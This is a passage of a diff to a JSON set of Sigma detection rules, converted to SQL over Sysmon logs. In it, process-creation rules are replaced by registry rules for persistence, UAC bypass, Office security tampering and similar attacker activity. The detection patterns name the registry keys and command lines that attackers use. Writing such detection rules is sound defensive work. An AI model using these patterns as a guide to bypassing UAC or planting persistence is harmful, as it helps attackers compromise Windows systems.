'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR 
Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron 
Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. 
Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE 
'%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE 
'%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' 
ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE 
'%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": 
"0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path 
where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR 
CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 
